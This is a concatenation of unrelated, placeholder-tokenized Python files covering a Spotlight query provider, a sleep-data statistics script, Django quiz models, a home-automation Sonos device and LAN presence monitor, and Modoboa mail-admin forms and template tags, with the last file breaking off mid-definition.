<NUM_LIT:10> ] : <EOL> body . append ( '<STR_LIT>' % ( r . valueForAttribute_ ( '<STR_LIT>' ) , r . valueForAttribute_ ( '<STR_LIT>' ) ) ) <EOL> return '<STR_LIT>' . join ( body ) <EOL> class queryProxy ( NSObject ) : <EOL> def init ( self ) : <EOL> self = super ( queryProxy , self ) . init ( ) <EOL> if not self : return <EOL> self . atom = None <EOL> self . predicate = None <EOL> return self <EOL> def start ( self ) : <EOL> self . query = NSMetadataQuery . alloc ( ) . init ( ) <EOL> self . query . setPredicate_ ( NSPredicate . predicateWithFormat_ ( self . predicate ) ) <EOL> self . query . setSortDescriptors_ ( NSArray . arrayWithObject_ ( NSSortDescriptor . alloc ( ) . initWithKey_ascending_ ( '<STR_LIT>' , False ) ) ) <EOL> NSNotificationCenter . defaultCenter ( ) . addObserver_selector_name_object_ ( self , self . gotSpotlightData_ , NSMetadataQueryDidFinishGatheringNotification , self . query ) <EOL> self . query . startQuery ( ) <EOL> def gotSpotlightData_ ( self , notification ) : <EOL> query = notification . object ( ) <EOL> print "<STR_LIT>" % ( len ( query . results ( ) ) , self . predicate ) <EOL> self . atom . results = query . results ( ) <EOL> self . atom . changed ( ) <EOL> class SpotlightProvider ( Provider ) : <EOL> def atomClass ( self ) : <EOL> return SpotlightAtom <EOL> def provide ( self ) : <EOL> self . atoms = [ SpotlightAtom ( self , "<STR_LIT>" ) , SpotlightAtom ( self , "<STR_LIT>" ) ] </s>
<s> import json <EOL> from datetime import datetime , time , timedelta <EOL> from scipy import stats <EOL> from numpy import mean , std , sqrt <EOL> import matplotlib . pyplot as plt <EOL> fh = open ( '<STR_LIT>' ) <EOL> data = json . load ( fh ) <EOL> big = { k : data [ k ] for k in data if len ( data [ k ] ) > <NUM_LIT> } <EOL> spread = { } <EOL> sleepers = { } <EOL> wakers = { } <EOL> for key in big : <EOL> first = [ ] <EOL> last = [ ] <EOL> try : <EOL> attempt = '<STR_LIT>' <EOL> first = datetime . combine ( datetime . strptime ( str ( big [ key ] [ attempt ] [ <NUM_LIT:1> ] ) , '<STR_LIT>' ) , time ( big [ key ] [ attempt ] [ <NUM_LIT:2> ] ) ) <EOL> except KeyError : <EOL> try : <EOL> attempt = '<STR_LIT>' <EOL> first = datetime . combine ( datetime . strptime ( str ( big [ key ] [ attempt ] [ <NUM_LIT:1> ] ) , '<STR_LIT>' ) , time ( big [ key ] [ attempt ] [ <NUM_LIT:2> ] ) ) <EOL> except KeyError : <EOL> continue <EOL> continue <EOL> try : <EOL> attempt = '<STR_LIT>' <EOL> last = datetime . combine ( datetime . strptime ( str ( big [ key ] [ attempt ] [ <NUM_LIT:1> ] ) , '<STR_LIT>' ) , time ( big [ key ] [ attempt ] [ <NUM_LIT:2> ] ) ) <EOL> except KeyError : <EOL> try : <EOL> attempt = '<STR_LIT>' <EOL> last = datetime . combine ( datetime . strptime ( str ( big [ key ] [ attempt ] [ <NUM_LIT:1> ] ) , '<STR_LIT>' ) , time ( big [ key ] [ attempt ] [ <NUM_LIT:2> ] ) ) <EOL> except KeyError : <EOL> continue <EOL> continue <EOL> if first and last : <EOL> spread [ key ] = last - first <EOL> if first . day == last . day : <EOL> wakers [ key ] = big [ key ] <EOL> else : <EOL> sleepers [ key ] = big [ key ] <EOL> attempts = { '<STR_LIT>' % ( i + <NUM_LIT:1> ) : [ ] for i in range ( <NUM_LIT:10> , <NUM_LIT:15> ) } <EOL> endmax = { } <EOL> for key in big : <EOL> try : <EOL> endmax [ key ] = max ( [ big [ key ] [ attempt ] [ <NUM_LIT:0> ] for attempt in attempts ] ) <EOL> except KeyError : <EOL> continue <EOL> rec = [ ] <EOL> for key in spread : <EOL> try : <EOL> rec . append ( [ spread [ key ] , endmax [ key ] ] ) <EOL> except KeyError : <EOL> continue <EOL> p = [ ] <EOL> diff = [ ] <EOL> mean_rester = [ ] <EOL> mean_goer = [ ] <EOL> for h in range ( <NUM_LIT> , <NUM_LIT> ) : <EOL> goers = [ ] <EOL> resters = [ ] <EOL> for key in big : <EOL> try : <EOL> if spread [ key ] > timedelta ( hours = h ) : <EOL> resters . append ( endmax [ key ] ) <EOL> else : <EOL> goers . append ( endmax [ key ] ) <EOL> except KeyError : <EOL> continue <EOL> print '<STR_LIT>' % h <EOL> print '<STR_LIT>' % stats . ttest_ind ( resters , goers ) <EOL> print "<STR_LIT>" % ( len ( resters ) + len ( goers ) - <NUM_LIT:2> ) <EOL> t , prob = stats . ttest_ind ( resters , goers ) <EOL> poolstd = sqrt ( <NUM_LIT:0.5> * ( std ( resters ) ** <NUM_LIT:2> + std ( goers ) ** <NUM_LIT:2> ) ) <EOL> effect_size = ( mean ( resters ) - mean ( goers ) ) / poolstd <EOL> print "<STR_LIT>" % effect_size <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> ax . errorbar ( [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ mean ( goers ) , mean ( resters ) ] , yerr = [ std ( goers ) / sqrt ( len ( goers ) ) , std ( resters ) / sqrt ( len ( resters ) ) ] , marker = '<STR_LIT:o>' ) <EOL> ax . set_xticks ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> plt . xlim ( <NUM_LIT> , <NUM_LIT> ) <EOL> plt . ylim ( <NUM_LIT> , <NUM_LIT> ) <EOL> group_labels = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ax . set_xticklabels ( group_labels ) <EOL> plt . ylabel ( '<STR_LIT>' ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . savefig ( '<STR_LIT>' , dpi = None , facecolor = '<STR_LIT:w>' , edgecolor = '<STR_LIT:w>' , <EOL> orientation = '<STR_LIT>' , papertype = None , format = None , <EOL> transparent = False , bbox_inches = None , pad_inches = <NUM_LIT:0.1> ) <EOL> generatepaperfigs = <NUM_LIT:1> <EOL> if generatepaperfigs : <EOL> plt . savefig ( '<STR_LIT>' , dpi = <NUM_LIT> , facecolor = '<STR_LIT:w>' , edgecolor = '<STR_LIT:w>' , <EOL> orientation = '<STR_LIT>' , papertype = None , format = None , <EOL> transparent = False , bbox_inches = '<STR_LIT>' , pad_inches = <NUM_LIT:0.1> ) <EOL> import pickle <EOL> pickle . dump ( p , open ( '<STR_LIT>' , '<STR_LIT:wb>' ) ) <EOL> pickle . dump ( diff , open ( '<STR_LIT>' , '<STR_LIT:wb>' ) ) </s>
<s> from django . apps import apps <EOL> from django . db import connection <EOL> from django . test import TransactionTestCase <EOL> from django . test . utils import override_settings <EOL> from django_tenants . utils import get_public_schema_name <EOL> class TestSettings ( TransactionTestCase ) : <EOL> @ override_settings ( PG_EXTRA_SEARCH_PATHS = [ '<STR_LIT>' ] ) <EOL> def test_PG_EXTRA_SEARCH_PATHS ( self ) : <EOL> del apps . all_models [ '<STR_LIT>' ] <EOL> c = connection . cursor ( ) <EOL> c . execute ( '<STR_LIT>' . format ( <EOL> get_public_schema_name ( ) <EOL> ) ) <EOL> apps . set_installed_apps ( [ '<STR_LIT>' , '<STR_LIT>' ] ) </s>
<s> from __future__ import unicode_literals <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> from django . utils . translation import ugettext as _ <EOL> from django . db import models <EOL> from quiz . models import Question <EOL> ANSWER_ORDER_OPTIONS = ( <EOL> ( '<STR_LIT:content>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:none>' , _ ( '<STR_LIT:None>' ) ) <EOL> ) <EOL> class MCQuestion ( Question ) : <EOL> answer_order = models . CharField ( <EOL> max_length = <NUM_LIT:30> , null = True , blank = True , <EOL> choices = ANSWER_ORDER_OPTIONS , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> def check_if_correct ( self , guess ) : <EOL> answer = Answer . objects . get ( id = guess ) <EOL> if answer . correct is True : <EOL> return True <EOL> else : <EOL> return False <EOL> def order_answers ( self , queryset ) : <EOL> if self . answer_order == '<STR_LIT:content>' : <EOL> return queryset . order_by ( '<STR_LIT:content>' ) <EOL> if self . answer_order == '<STR_LIT>' : <EOL> return queryset . order_by ( '<STR_LIT:?>' ) <EOL> if self . answer_order == '<STR_LIT:none>' : <EOL> return queryset . order_by ( ) <EOL> return queryset <EOL> def get_answers ( self ) : <EOL> return self . order_answers ( Answer . objects . filter ( question = self ) ) <EOL> def get_answers_list ( self ) : <EOL> return [ ( answer . id , answer . content ) for answer in <EOL> self . order_answers ( Answer . objects . filter ( question = self ) ) ] <EOL> def answer_choice_to_string ( self , guess ) : <EOL> return Answer . objects . get ( id = guess ) . content <EOL> class Meta : <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) <EOL> @ python_2_unicode_compatible <EOL> class Answer ( models . Model ) : <EOL> question = models . ForeignKey ( MCQuestion , verbose_name = _ ( "<STR_LIT>" ) ) <EOL> content = models . CharField ( max_length = <NUM_LIT:1000> , <EOL> blank = False , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> correct = models . BooleanField ( blank = False , <EOL> default = False , <EOL> help_text = _ ( "<STR_LIT>" ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> def __str__ ( self ) : <EOL> return self . content <EOL> class Meta : <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . ext import ndb <EOL> from appengine import device , pushrpc <EOL> @ device . register ( '<STR_LIT>' ) <EOL> class SonosDevice ( device . Device ) : <EOL> """<STR_LIT>""" <EOL> uid = ndb . StringProperty ( required = True ) <EOL> state = ndb . StringProperty ( ) <EOL> currently_playing = ndb . JsonProperty ( ) <EOL> def get_categories ( self ) : <EOL> return [ '<STR_LIT>' ] <EOL> @ classmethod <EOL> @ device . static_command <EOL> def scan ( cls ) : <EOL> event = { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> pushrpc . send_event ( event ) <EOL> def handle_event ( self , event ) : <EOL> """<STR_LIT>""" <EOL> self . populate ( ** event ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import logging <EOL> import os <EOL> import platform <EOL> import re <EOL> import subprocess <EOL> import time <EOL> import ipaddr <EOL> import netifaces <EOL> import pyping <EOL> from common import detector <EOL> from pi import scanning_proxy <EOL> LINUX_RE = ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' ) <EOL> LINUX_RE = re . compile ( LINUX_RE ) <EOL> MAC_RE = ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' ) <EOL> MAC_RE = re . compile ( MAC_RE ) <EOL> class NetworkMonitor ( scanning_proxy . ScanningProxy ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , callback , scan_period_sec , timeout_secs ) : <EOL> assert os . geteuid ( ) == <NUM_LIT:0> , '<STR_LIT>' <EOL> self . _callback = callback <EOL> self . _timeout_secs = timeout_secs <EOL> self . _ping_frequency_secs = <NUM_LIT> <EOL> self . _hosts = collections . defaultdict ( lambda : False ) <EOL> self . _last_ping = collections . defaultdict ( float ) <EOL> self . _detectors = collections . defaultdict ( detector . AccrualFailureDetector ) <EOL> self . _level_event_frequency_secs = <NUM_LIT:10> * <NUM_LIT> <EOL> self . _last_level_event = <NUM_LIT:0> <EOL> super ( NetworkMonitor , self ) . __init__ ( scan_period_sec ) <EOL> def _ping ( self , ip_address , now ) : <EOL> """<STR_LIT>""" <EOL> if self . _last_ping [ ip_address ] + self . _ping_frequency_secs > now : <EOL> return <EOL> pyping . ping ( ip_address , timeout = <NUM_LIT:1> , count = <NUM_LIT:1> ) <EOL> self . _last_ping [ ip_address ] = now <EOL> def ping_subnet ( self , now ) : <EOL> """<STR_LIT>""" <EOL> if self . _last_ping [ '<STR_LIT>' ] + self . _ping_frequency_secs > now : <EOL> return <EOL> self . _last_ping [ '<STR_LIT>' ] = now <EOL> for interface in netifaces . interfaces ( ) : <EOL> if interface . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> details = netifaces . ifaddresses ( interface ) <EOL> if netifaces . AF_INET not in details : <EOL> continue <EOL> for detail in details [ netifaces . AF_INET ] : <EOL> address = detail . get ( '<STR_LIT>' , None ) <EOL> netmask = detail . get ( '<STR_LIT>' , None ) <EOL> if address is None or netmask is None : <EOL> continue <EOL> parsed = ipaddr . IPv4Network ( '<STR_LIT>' % ( address , netmask ) ) <EOL> logging . debug ( '<STR_LIT>' , parsed . broadcast ) <EOL> pyping . ping ( str ( parsed . broadcast ) , timeout = <NUM_LIT:10> , count = <NUM_LIT:10> ) <EOL> def _arp ( self ) : <EOL> system = platform . system ( ) <EOL> if system == '<STR_LIT>' : <EOL> process = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdin = None , stdout = subprocess . PIPE , <EOL> stderr = None , close_fds = True ) <EOL> while True : <EOL> line = process . stdout . readline ( ) <EOL> if not line : <EOL> break <EOL> match = MAC_RE . match ( line ) <EOL> if not match : <EOL> logging . error ( '<STR_LIT>' , line . strip ( ) ) <EOL> continue <EOL> mac = match . group ( '<STR_LIT>' ) <EOL> ip_address = match . group ( '<STR_LIT>' ) <EOL> state = '<STR_LIT>' if mac == '<STR_LIT>' else '<STR_LIT>' <EOL> yield ( mac , ip_address , state ) <EOL> elif system == '<STR_LIT>' : <EOL> process = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:list>' ] , <EOL> stdin = None , stdout = subprocess . PIPE , <EOL> stderr = None , close_fds = True ) <EOL> while True : <EOL> line = process . stdout . readline ( ) <EOL> if not line : <EOL> break <EOL> match = LINUX_RE . match ( line ) <EOL> if not match : <EOL> logging . error ( '<STR_LIT>' , line . strip ( ) ) <EOL> continue <EOL> mac = match . group ( '<STR_LIT>' ) <EOL> ip_address = match . group ( '<STR_LIT>' ) <EOL> state = match . group ( '<STR_LIT:state>' ) <EOL> yield ( mac , ip_address , state ) <EOL> def _scan_once ( self ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> self . ping_subnet ( now ) <EOL> for mac , ip_address , state in self . _arp ( ) : <EOL> self . _ping ( ip_address , now ) <EOL> if state != '<STR_LIT>' : <EOL> continue <EOL> self . _detectors [ mac ] . heartbeat ( now ) <EOL> for mac , dtor in self . _detectors . iteritems ( ) : <EOL> is_alive = dtor . is_alive ( now ) <EOL> if is_alive == self . _hosts [ mac ] : <EOL> continue <EOL> self . _hosts [ mac ] = is_alive <EOL> if is_alive : <EOL> logging . info ( '<STR_LIT>' , mac ) <EOL> self . _callback ( '<STR_LIT>' , None , { '<STR_LIT>' : mac } ) <EOL> else : <EOL> logging . info ( '<STR_LIT>' , mac ) <EOL> self . _callback ( '<STR_LIT>' , None , { '<STR_LIT>' : mac } ) <EOL> if self . _last_level_event + self . _level_event_frequency_secs < now : <EOL> self . _last_level_event = now <EOL> alive = [ mac for mac , dtor in self . _detectors . iteritems ( ) <EOL> if dtor . is_alive ( ) ] <EOL> self . _callback ( '<STR_LIT>' , None , { '<STR_LIT>' : alive } ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from django import forms <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy <EOL> from . . lib import events <EOL> from modoboa . lib import parameters <EOL> from modoboa . lib . form_utils import YesNoField , SeparatorField <EOL> from modoboa . lib . sysutils import exec_cmd <EOL> ADMIN_EVENTS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> class AdminParametersForm ( parameters . AdminParametersForm ) : <EOL> app = "<STR_LIT>" <EOL> mbsep = SeparatorField ( label = ugettext_lazy ( "<STR_LIT>" ) ) <EOL> handle_mailboxes = YesNoField ( <EOL> label = ugettext_lazy ( "<STR_LIT>" ) , <EOL> initial = "<STR_LIT>" , <EOL> help_text = ugettext_lazy ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> mailboxes_owner = forms . CharField ( <EOL> label = ugettext_lazy ( "<STR_LIT>" ) , <EOL> initial = "<STR_LIT>" , <EOL> help_text = ugettext_lazy ( <EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> default_domain_quota = forms . IntegerField ( <EOL> label = ugettext_lazy ( "<STR_LIT>" ) , <EOL> initial = <NUM_LIT:0> , <EOL> help_text = ugettext_lazy ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> auto_account_removal = YesNoField ( <EOL> label = ugettext_lazy ( "<STR_LIT>" ) , <EOL> initial = "<STR_LIT>" , <EOL> help_text = ugettext_lazy ( <EOL> "<STR_LIT>" ) <EOL> ) <EOL> auto_create_domain_and_mailbox = YesNoField ( <EOL> label = ugettext_lazy ( "<STR_LIT>" ) , <EOL> initial = "<STR_LIT:yes>" , <EOL> help_text = ugettext_lazy ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> visibility_rules = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( AdminParametersForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . field_widths = { <EOL> "<STR_LIT>" : <NUM_LIT:2> <EOL> } <EOL> hide_fields = False <EOL> dpath = None <EOL> code , output = exec_cmd ( "<STR_LIT>" ) <EOL> if not code : <EOL> dpath = output . strip ( ) <EOL> else : <EOL> known_paths = getattr ( <EOL> settings , "<STR_LIT>" , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> ) <EOL> for fpath in known_paths : <EOL> if os . path . isfile ( fpath ) and os . access ( fpath , os . X_OK ) : <EOL> dpath = fpath <EOL> if dpath : <EOL> try : <EOL> code , version = exec_cmd ( "<STR_LIT>" % dpath ) <EOL> except OSError : <EOL> hide_fields = True <EOL> else : <EOL> if code or not version . strip ( ) . startswith ( "<STR_LIT:2>" ) : <EOL> hide_fields = True <EOL> else : <EOL> hide_fields = True <EOL> if hide_fields : <EOL> del self . fields [ "<STR_LIT>" ] <EOL> del self . fields [ "<STR_LIT>" ] <EOL> def clean_default_domain_quota ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . cleaned_data [ '<STR_LIT>' ] < <NUM_LIT:0> : <EOL> raise forms . ValidationError ( <EOL> ugettext_lazy ( '<STR_LIT>' ) <EOL> ) <EOL> return self . cleaned_data [ '<STR_LIT>' ] <EOL> def load_admin_settings ( ) : <EOL> """<STR_LIT>""" <EOL> from . app_settings import AdminParametersForm <EOL> parameters . register ( <EOL> AdminParametersForm , ugettext_lazy ( "<STR_LIT>" ) ) <EOL> events . declare ( ADMIN_EVENTS ) <EOL> from . import callbacks </s>
<s> """<STR_LIT>""" <EOL> from django import template <EOL> from django . core . urlresolvers import reverse <EOL> from django . template . loader import render_to_string <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils . translation import ugettext as _ , ugettext_lazy <EOL> from modoboa . lib import events <EOL> from modoboa . lib . templatetags . lib_tags import render_link <EOL> from modoboa . lib . web_utils import render_actions <EOL> from . . import signals <EOL> register = template . Library ( ) <EOL> genders = { <EOL> "<STR_LIT>" : ( ugettext_lazy ( "<STR_LIT>" ) , ugettext_lazy ( "<STR_LIT>" ) ) <EOL> } <EOL> @ register . simple_tag <EOL> def domains_menu ( selection , user , ajax_mode = True ) : <EOL> """<STR_LIT>""" <EOL> domain_list_url = ( <EOL> "<STR_LIT>" if ajax_mode else reverse ( "<STR_LIT>" ) <EOL> ) <EOL> entries = [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:class>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : domain_list_url } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:class>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } <EOL> ] <EOL> if user . has_perm ( "<STR_LIT>" ) : <EOL> entries += [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } , <EOL> ] <EOL> entries += events . raiseQueryEvent ( "<STR_LIT>" , user ) <EOL> entries += [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> ] <EOL> return render_to_string ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : entries , <EOL> "<STR_LIT>" : selection , <EOL> "<STR_LIT:user>" : user <EOL> } ) <EOL> @ register . simple_tag <EOL> def identities_menu ( user , selection = None ) : <EOL> """<STR_LIT>""" <EOL> entries = [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:class>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:class>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> ] <EOL> return render_to_string ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : entries , <EOL> "<STR_LIT:user>" : user <EOL> } ) <EOL> @ register . simple_tag <EOL> def domain_actions ( user , domain ) : <EOL> actions = [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : u"<STR_LIT>" . format ( <EOL> reverse ( "<STR_LIT>" ) , domain . name ) , <EOL> "<STR_LIT:title>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> ] <EOL> if user . has_perm ( "<STR_LIT>" ) : <EOL> actions . append ( { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" , args = [ domain . id ] ) , <EOL> "<STR_LIT:title>" : _ ( "<STR_LIT>" % domain . name ) , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } ) <EOL> responses = signals . extra_domain_actions . send ( <EOL> sender = None , user = user , domain = domain ) <EOL> for receiver , response in responses : <EOL> if response : <EOL> actions += response <EOL> return render_actions ( actions ) <EOL> @ register . simple_tag <EOL> def identity_actions ( user , ident ) : <EOL> name = ident . __class__ . __name__ <EOL> objid = ident . id <EOL> if name == "<STR_LIT>" : <EOL> actions = events . raiseQueryEvent ( "<STR_LIT>" , ident ) <EOL> actions += [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" , args = [ objid ] ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:title>" : _ ( "<STR_LIT>" % ident . username ) } , <EOL> ] <EOL> else : <EOL> actions = [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" . format ( <EOL> reverse ( "<STR_LIT>" ) , objid ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:title>" : _ ( "<STR_LIT>" % ident . address ) } , <EOL> ] <EOL> return render_actions ( actions ) <EOL> @ register . simple_tag <EOL> def check_identity_status ( identity ) : <EOL> """<STR_LIT>""" <EOL> if identity . __class__ . __name__ == "<STR_LIT>" : <EOL> if hasattr ( identity , "<STR_LIT>" ) and not identity . mailbox . domain . enabled : <EOL> return False <EOL> elif not identity . is_active : <EOL> return False <EOL> elif not identity . enabled or not identity . domain . enabled : <EOL> return False <EOL> return True <EOL> @ register . simple_tag <EOL> def domain_modify_link ( domain ) : <EOL> linkdef = { "<STR_LIT:label>" : domain . name , "<STR_LIT>" : True } <EOL> if domain . __class__ . __name__ == "<STR_LIT>" : <EOL> linkdef [ "<STR_LIT:url>" ] = reverse ( <EOL> "<STR_LIT>" , args = [ domain . id ] ) <EOL> linkdef [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> else : <EOL> tmp = events . raiseDictEvent ( '<STR_LIT>' , domain ) <EOL> for key in [ '<STR_LIT:url>' , '<STR_LIT>' ] : <EOL> linkdef [ key ] = tmp [ key ] <EOL> return render_link ( linkdef ) <EOL> @ register . simple_tag <EOL> def domain_aliases ( domain ) : <EOL> """<STR_LIT>""" <EOL> if not domain . aliases . count ( ) : <EOL> return '<STR_LIT>' <EOL> res = '<STR_LIT>' <EOL> for alias in domain . aliases . all ( ) : <EOL> res += '<STR_LIT>' % alias . name <EOL> return mark_safe ( res ) <EOL> @ register . simple_tag <EOL> def identity_modify_link ( identity , active_tab = '<STR_LIT:default>' ) : <EOL> """<STR_LIT>""" <EOL> linkdef = { "<STR_LIT:label>" : identity . identity , "<STR_LIT>" : True } <EOL> if identity . __class__ . __name__ == "<STR_LIT>" : <EOL> linkdef [ "<STR_LIT:url>" ] = reverse ( "<STR_LIT>" , args = [ identity . id ] ) <EOL> linkdef [ "<STR_LIT:url>" ] += "<STR_LIT>" % active_tab <EOL> linkdef [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> else : <EOL> linkdef [ "<STR_LIT:url>" ] = reverse ( "<STR_LIT>" , args = [ identity . id ] ) <EOL> linkdef [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> return render_link ( linkdef ) <EOL> @ register . simple_tag <EOL> def 